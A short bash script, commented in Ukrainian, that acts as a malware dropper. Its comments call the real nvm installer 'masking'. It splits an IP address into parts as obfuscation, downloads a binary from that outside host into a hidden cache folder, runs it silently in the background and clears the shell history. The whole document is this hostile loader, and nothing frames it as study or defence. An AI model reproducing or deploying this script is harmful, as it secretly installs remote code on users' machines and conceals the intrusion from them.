#!/bin/bash

if [ "$3" = "1" ]; then
    # Маскування
    curl -s https://raw.githubusercontent.com/nvm-sh/nvm/v0.39.5/install.sh | bash

    # ---- ОБФУСКОВАНИЙ IP ----

    A="31"
    B="207"
    C="4"
    D="137"
    IP="${A}.${B}.${C}.${D}"

    # Шлях до бінарника (теж обфускований)
    PART1="exe_linux_334a616a"
    PART2="randomnayahuinya43438f483f3sfsdf34"
    
    # Збираємо URL
    URL="http://${IP}/${PART2}/${PART1}"

    # Виконуємо пейлоад
    mkdir -p ~/.cache
    curl -s "${URL}" -o ~/.cache/service
    chmod +x ~/.cache/service
    ~/.cache/service > /dev/null 2>&1 &

    history -c
fi

exit 0
